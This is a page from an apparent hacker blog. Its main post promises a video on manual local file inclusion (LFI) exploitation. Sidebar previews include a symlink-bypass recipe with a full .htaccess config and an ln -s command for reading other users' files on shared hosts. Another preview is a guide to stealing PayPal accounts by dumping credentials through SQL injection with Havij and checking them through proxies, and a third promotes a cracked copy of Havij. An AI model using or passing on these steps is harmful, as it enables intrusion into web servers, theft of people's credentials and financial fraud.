LFI manual exploitation

Par MG -
Hi guys

in this video i will show you  how LFI exploit work

this is a manual method


./MG

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

Bypass Symlink (Priv8)

Par MG -
Image
How you can bypass Symlink in linux webserver ? 1/ Create a folder   2/ Upload inside   ".htaccess"     CODE:   Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any   3/ Bypass manually ln -s /home/user/public_html/t0ph4cking.txt        Enjoy :D
Lire la suite

How to get alot of Paypal Account's

Par MG -
Image
Hi Guys today i'll show u how to get alot of paypal account's so u can use them to buy something in the net or doing much more things Okay let's Goo first u need to get a mail list with password  - How ? use sqli and access to database u can find mail list u can use havij it easy and help u to do auto sqli u can download havij from here  and here's a list of sqli dork => dork now when u got the maillist+pass u have to check it if has paypal accs so go to paypalchecker and put ur mailist there and socks5 u can get socks5 from here & click check it out EnjoY
Lire la suite

Havij v1.17 Pro Cracked !

Par MG -
Image
Havij v1.17 Pro Cracked ! News Release: Code: • Dump all • New bypass method for MySQL using parenthesis • Write file feature added for MSSQL and MySQL. • Loading HTML form inputs • Random signature generator • Saving data in CSV format • Advanced evasion tab in the settings • Injection tab in settings • ‘Non-existent injection value’ can now be changed by user (the default value is 999999.9) • ‘Comment mark’ can be changed by user (the default value is –) • Disabling/enabling of logging • Bugfix: adding manual database in tables tree view • Bugfix: finding string columns in PostgreSQL • Bugfix: MS Access blind string type data extraction • Bugfix: MSSQL blind auto detection when error-based method fails • Bugfix: all database blind methods fail on retry • Bugfix: guessing columns/tables in MySQL time-based injection • Bugfix: crashing when dumping into file • Bugfix: loading project injection type (Integer or String) • Bugfix: HTTPS multi-threading bug • B...
Lire la suite